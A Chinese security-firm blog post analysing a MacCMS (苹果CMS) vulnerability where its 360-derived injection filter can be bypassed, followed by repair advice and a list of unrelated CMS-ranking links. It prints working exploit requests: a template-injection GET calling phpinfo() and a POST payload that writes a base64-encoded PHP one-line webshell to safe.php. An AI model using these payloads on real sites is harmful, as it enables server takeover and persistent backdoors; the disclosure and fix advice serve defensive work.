网站漏洞修补之苹果cms建站系统
苹果cms系统,是目前很多电影网站都在使用的一套网站系统,开源,免费,扩展性较好,支持一键采集,伪静态化,高并发的同时承载,获得的很多站长的喜欢,于近日被网站安全检测发现,maccms存在网站漏洞,sql注入盲射获取数据库的管理员账号密码,关于该漏洞的详情,我们仔细分析看下.
maccms漏洞分析与修复
苹果CMS采用的是php语言开发的代码,使用的数据库是mysql类型,这种架构是比较常用的,也是比较稳定的,但是在安全方面出现的问题是比较多的,这次发现的是sql注入漏洞,在网站的根目录下的inc文件里的module目录下的vod.php代码如下图所示:
代码里的empty($wd函数,在进行判断如果是,或者不是的逻辑过程当中,会将前段用户访问带来的参数,进行安全过滤,我们跟进代码来追寻到苹果CMS的配置文件,在function.php配置文件代码李看到对网站的所有请求方式包括get、post、cookies的提交方式都强制性的进行了安全转义。网站漏洞问题的发生就在这里.
我们仔细又发现,maccms使用了360安全提供的防止sql注入拦截代码。360的防止sql注入是好几年前开发,并公开在网络上的,已经很久没有更新维护了并且还存在sql注入代码绕过的情况,参数值之间进行实体转换的时候,360的sql拦截规则没有对空白符以及反斜杠进行拦截,导致可以绕过插入恶意参数,直接请求到苹果cms后端数据库中去,获取苹果CMS的管理员账号密码。
我们来看下如何利用苹果CMS的漏洞,从上面漏洞发生的细节里可以看出,是因为拦截sql注入语句的过程中存在可以被绕过的漏洞。我们来使用%0b,以及空格对代码进行注入,sql语句在拼接中,可以插入反斜杠进行单引号的报错,从而绕过苹果CMS的安全拦截。语句如下:
GET请求:
http://127.0.0.1/index.PHP?m=vod-search&wd={if-A:phpinfo()}{endif-A}
可以直接看php的具体信息
POST请求
可以直接获取webshell
http://127.0.0.1/index.PHP?m=vod-search
POST内容如下:
wd={if-A:print(fputs%28fopen%28_decode%28Yy5waHA%29,w%29,_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}
可以直接生成带有一句话木马后门的代码,文件名为safe.php,一句话木马链接密码是safe.
如何修复苹果cms网站漏洞呢?
对网站漏洞的修复我们要知道漏洞产生的原因,以及为何会绕过苹果CMS的安全过滤,maccms使用的addslash安全函数,sql中没有加单引号的安全防护,in字句也很容易忘记加引号,再一个后期处理安全过滤的时候可以插入单引号,stripslash导致可以加入单引号,编解码导致绕过addslash,使用urldecode编码进行注入绕过,根据上面提出的漏洞绕过,我们SINE安全提出漏洞修复的建议是:对URL解码进行双层的转义,对get,post,cookies的拦截规则进行安全更新,加强空格,以及百分符号的拦截,如果对程序代码不熟悉的话建议咨询专业的网站安全公司来处理解决。
网站漏洞修补之苹果cms建站系统相关推荐
- cms php vue 开源_2020最受欢迎的企业网站CMS建站系统排行榜
对于大多数站长来说,企业网站CMS可能再熟悉不过了.但对于新手站长来讲,可能还不太了解什么是企业网站CMS,或企业网站CMS是做什么的.而我们经常可以在网上看见有人问:哪个CMS系统最好用?企业建站用 ...
- 【网站】国内 前6名 Java开源CMS建站系统
下面我们开始分享一下开源中国中最火的Java开源CMS建站系统(代码可以到gitee.com中下载 搜一下项目名称) (1)铭飞 / MCMS(开发人/项目名称) watch 1800 star 34 ...
- 2021最新汇总:国内外知名的cms建站系统,这些你必须知道
以云计算.大数据.AI.区块链等为代表的新一代数字技术,正推动全球进入数字经济新时代,越来越多的企业探索并快速推进数字化进程,并作为业务转型重要战略.目前国内都有不少CMS系统,许多企业就非常纠结哪个 ...
- 哪个CMS建站系统更利于seo优化
提到网站建设,最先想到的就是下载CMS建站系统来建站,当然不乏还有会外包定制的方式,那成本就另说了,采用CMS系统建站优势便是开发省时且价格给力,而且功能完整,比定制开发的体验性,功能性方面都强大很多 ...
- 这些年我们用过的CMS建站系统
随着互联网不断发展,电子商务将会成为中国经济发展中涌动的一股巨大的暗流,在未来几年将很快会形成井喷状态.近年来我们也认识了各类不同的CMS建站系统,不断推出了各类企业网站解决方案,为企业电子商务发展提 ...
- 2018最受欢迎开源免费CMS建站系统排行榜
2018最受欢迎开源免费CMS建站系统排行榜 随着互联网及web应用技术的蓬勃发展,网上针对企业建站的各种CMS建站系统层出不穷,如今企业建站和维护的成本已不像过去那么高.经常在网上看见有人问及&qu ...
- 三大受欢迎的免费开源CMS建站系统
随着互联网应用开发技术的快速发展,各种用于快速制作网站的CMS网站内容管理系统层出不穷,现在,制作网站的成本和难度大大降低.现在只要提到做网站,最先想到就就是使用cms系统来做,但是国内cms众多,功 ...
- PageAdmin,织梦DedeCms和Wordpress—CMS建站系统怎么选
现在建网站,90%都会采用cms建站系统.可是优秀的建站系统那么多,像国外的JOOMLA.WORDPRESS,国产的PageAdmin.织梦DEDECMS.JTBC.DISCUZ等:网上也有一大堆测评 ...
- 开源免费CMS建站系统用哪个好,怎么选择?
随着互联网及web应用技术的快速发展,如今的网站建设已经发生了很大变化,不再像过去那样一个980px网站即可完成,如今什么响应式网站.三合一网站.四合一网站.甚至五合一都出现在了我们的视野,同时针对企 ...
- 2019最受欢迎开源免费CMS建站系统排行榜
2019独角兽企业重金招聘Python工程师标准>>> 互联网的蓬勃发展,免费且开源的建站系统的层出不穷,而我们经常在网上看见有人问及"哪个CMS系统最好用".& ...
最新文章
- 实时摄像头数据传输丢包问题
- word2vec相似度计算_文档相似度助力搜索引擎
- java并行流 阻塞主线程_多线程入门案例与java8的并行流
- telnet和ping区别
- P.Laguna / AUTOMATIC DETECTION OF WAVE BOUNDARIES IN MULTILEAD ECG SIGNALS VALIDATION WITH THE CSE
- NO.6 计算数组中存在重复元素 II
- avod论文理解与代码解读
- 关于windows 7 启动 security center
- 论文查重软件哪个好用?
- 国产手机提价终遭受重大损失,降价的苹果反而逆势增长
- CleanMyMac最新破解安装版
- CH9121串口转以太网配置调试
- 有种音乐的名字叫做周杰伦
- 社区服务器目录迁移实际开发运用
- android游戏手柄,没手柄也不怕 键盘玩Android游戏攻略
- [置顶] VMWare不能安装64位操作系统原因探析
- 工具软件价值分化,Adobe、万兴科技、猎豹移动们为何不同命?
- 2021-11-19迭代器的设计原则和iterator Traits的作用与设计
- 网管接口重构(2014年)
- HDMI音视频数据转换方案|HDMI转VGA视频转换方案|AG6201和AG6200设计参考对比